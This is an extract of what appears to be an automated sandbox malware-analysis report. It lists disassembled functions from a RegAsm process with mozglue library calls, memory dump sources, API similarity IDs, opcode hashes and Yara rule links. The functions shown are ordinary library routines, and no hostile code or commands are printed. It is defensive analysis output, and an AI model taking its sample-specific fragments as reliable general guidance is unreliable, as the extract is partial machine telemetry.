                                                                                                                                                                                                                                                    Function 6C7320C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: GetCurrentThreadId.KERNEL32 ref: 6C70FA8D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: AcquireSRWLockExclusive.KERNEL32(6C75F448,?,6C70FA1F,?,?,6C6E5407), ref: 6C70FA99
                                                                                                                                                                                                                                                      • Part of subcall function 6C732140: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?), ref: 6C732243
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,00000001,00000000,?,?,?,6C732633,?,?,?), ref: 6C73211D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_
                                                                                                                                                                                                                                                    • String ID: 3&sl$3&sl
                                                                                                                                                                                                                                                    • API String ID: 1463952509-3323159904
                                                                                                                                                                                                                                                    • Opcode ID: b1bea39ada561383f15ac2d9581150e94dcd9c8c2e476d231da122d45fe975c7
                                                                                                                                                                                                                                                    • Instruction ID: 82e3b30003e273ba6e8cb036fd256b51fd2c6298f66521268913b468a151fabc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1bea39ada561383f15ac2d9581150e94dcd9c8c2e476d231da122d45fe975c7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75012DB1A002299FCB00DF58D989BDABBF8FF49354F854069E905AB341D770A948CBA0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C736DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C736E22
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C736E3F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C736E1D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                    • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                    • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                    • Opcode ID: 83dd2b687d79cb52a60efab176a7c293ffbe7ea2ff701be841cfdd7196f30bbc
                                                                                                                                                                                                                                                    • Instruction ID: 0617a45b3e7faa34c4057b293a49a9df985e44dbb50cbf2d29ff1c0bc778311c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83dd2b687d79cb52a60efab176a7c293ffbe7ea2ff701be841cfdd7196f30bbc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DF05971684244CBDA009B68CB54A993375F703219F8411B5C40847BD2CF21A71ACB93
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 0040F380 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0040F3AF
                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0040F3C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                                                                    • String ID: |nB
                                                                                                                                                                                                                                                    • API String ID: 3728558374-3238407859
                                                                                                                                                                                                                                                    • Opcode ID: f98f86ba8f59f84c249afe5bd81803c9a7814ff6f5a8daff4d8e3595f346cc32
                                                                                                                                                                                                                                                    • Instruction ID: 119238285b73d8ce4f75f43b3c7ebb5d2629dd4ca5afc327dfba8b7bb554b20f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f98f86ba8f59f84c249afe5bd81803c9a7814ff6f5a8daff4d8e3595f346cc32
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBE0E575A0030866DB24EBB6E851ADE77688F10754F00827FFD15A22C0EB3CD6588699
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E9EEF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                    • String ID: Infinity$NaN
                                                                                                                                                                                                                                                    • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                    • Opcode ID: c1f52bf0e2781d634240acab1be13a1e9b2a9ffde6b6fef88fe9c5ade633e3c0
                                                                                                                                                                                                                                                    • Instruction ID: 064e185aa76c164315e344ac4f493be03cd9db8887338b18f04cd189461d7a10
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c1f52bf0e2781d634240acab1be13a1e9b2a9ffde6b6fef88fe9c5ade633e3c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49F0C2B1601749CBDB008F28DA6BBA433B1BB0731DFA00A79C6040BB80DF356556CBC6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0Kql,?,6C714B30,80000000,?,6C714AB7,?,6C6D43CF,?,6C6D42D2), ref: 6C6E6C42
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(0Kql,?,6C714B30,80000000,?,6C714AB7,?,6C6D43CF,?,6C6D42D2), ref: 6C6E6C58
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: moz_xmalloc$malloc
                                                                                                                                                                                                                                                    • String ID: 0Kql
                                                                                                                                                                                                                                                    • API String ID: 1967447596-3749716056
                                                                                                                                                                                                                                                    • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                    • Instruction ID: b7d16f6321e6c534d2a7dd2ccbf689db11161b3ca85c47443273f3989840aaba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EAE026F1A1A1081A9B08987C9C0956E75C88B1DBA87044A37E933C2BC8FA94E444805D
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C735900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6C7551C8), ref: 6C73591A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF), ref: 6C73592B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_SKELETON_UI_RESTARTING, xrefs: 6C735915
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseEnvironmentHandleVariable
                                                                                                                                                                                                                                                    • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                                                                                                                                                                                                    • API String ID: 297244470-335682676
                                                                                                                                                                                                                                                    • Opcode ID: ecb2f07d5bbb1429e79ab53c966579be643bd137d0c668330b4932ff57cbb5c2
                                                                                                                                                                                                                                                    • Instruction ID: 48ed9baceea58ed91ceab1f7cfeca5267931be4f320f880747a03a8794cc603d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb2f07d5bbb1429e79ab53c966579be643bd137d0c668330b4932ff57cbb5c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59E0DF30204254FBCB004B68EA087457FF89B13369F948524E46C83AC2CBB6A8408391
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E3850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(6C75F860), ref: 6C6E385C
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6C75F860,?), ref: 6C6E3871
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                                                                                                    • String ID: ,ul
                                                                                                                                                                                                                                                    • API String ID: 17069307-4126386095
                                                                                                                                                                                                                                                    • Opcode ID: 617b208a675b512cdc688df42854a336b6fd3e6a127bebbd86fc5214231dcea1
                                                                                                                                                                                                                                                    • Instruction ID: 2140f31e118b3b6ef5154b56b246aeeb9fb94aee2a258a666ed4e0f5abc93f97
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 617b208a675b512cdc688df42854a336b6fd3e6a127bebbd86fc5214231dcea1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67E02631A0AB1C9787029FA7850259B3B78EF0B7903C4802AF40E17E10CF30F18087C9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EBED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • DisableThreadLibraryCalls.KERNEL32(?), ref: 6C6EBEE3
                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6C6EBEF5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$CallsDisableLoadThread
                                                                                                                                                                                                                                                    • String ID: cryptbase.dll
                                                                                                                                                                                                                                                    • API String ID: 4137859361-1262567842
                                                                                                                                                                                                                                                    • Opcode ID: fe6012da9903913275c13e4a460adb5687b85ada534375b26dd0bad1f78cfab0
                                                                                                                                                                                                                                                    • Instruction ID: 1e63a50e7b176ada697a4e14fe8292fb3b64c90c0032fb0b5125186c29145d79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe6012da9903913275c13e4a460adb5687b85ada534375b26dd0bad1f78cfab0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40D0A731385208E6C6006B608D05B39377CA746355F50C031F30544851CBB1A421CF48
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D50E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6D4E9C,?,?,?,?,?), ref: 6C6D510A
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6D4E9C,?,?,?,?,?), ref: 6C6D5167
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6C6D5196
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6C6D4E9C), ref: 6C6D5234
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3510742995-0
                                                                                                                                                                                                                                                    • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                                    • Instruction ID: 7cb8845f3562b128add53dff6da1e071aa5d9a077a4512b7eaad74ce4b906a0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1491A075505616CFCB14CF08C890A56BBA2FF8A318B2A858CDC595BB15D771FC46CBE0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7108F0 Relevance: 5.2, APIs: 4, Instructions: 165COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC), ref: 6C710918
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C7109A6
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E7DC,?,00000000), ref: 6C7109F3
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E7DC), ref: 6C710ACB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                    • Opcode ID: 1847ade8daef700faeca9525d36f5579e55d5716c4675572e5c6062b20612062
                                                                                                                                                                                                                                                    • Instruction ID: f75b4a0c506c9ba419e42e56fe70e4cc9714ea713522b185daa3db502a2da446
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1847ade8daef700faeca9525d36f5579e55d5716c4675572e5c6062b20612062
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99512736B096588FEB089B25C61462533F5FB82B24B6D453AD96597F80DF30FC2187C0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C72B2C9,?,00000000,?,6C72B127,?,?,?,?,?,?,?,?,?,6C72AE52), ref: 6C72B628
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(00000000,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C7290FF
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(?,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C729108
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C72B2C9,?,00000000,?,6C72B127,?,?,?,?,?,?,?,?,?,6C72AE52), ref: 6C72B67D
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C72B2C9,?,00000000,?,6C72B127,?,?,?,?,?,?,?,?,?,6C72AE52), ref: 6C72B708
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C72B127,?,?,?,?,?,?,?,?), ref: 6C72B74D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: ec1987fabf263c55e8b35745ecea245c3d97a3e4d6239c868a4ad828244a8104
                                                                                                                                                                                                                                                    • Instruction ID: be09d6bf6d318f2ea53590a59784b58f27f27b331e0d91746c7745567f2341d8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec1987fabf263c55e8b35745ecea245c3d97a3e4d6239c868a4ad828244a8104
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D51C071A052168FDB14CF28CA84B5EB7B5FF49305F59852EC89BAB701DB35B804CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C72DF90 Relevance: 5.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C71FF2A), ref: 6C72DFFD
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(00000000,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C7290FF
                                                                                                                                                                                                                                                      • Part of subcall function 6C7290E0: free.MOZGLUE(?,00000000,00000000,?,6C72B6F6,?,?,?,?,?,6C72B127), ref: 6C729108
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C71FF2A), ref: 6C72E04A
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C71FF2A), ref: 6C72E0C0
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6C71FF2A), ref: 6C72E0FE
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
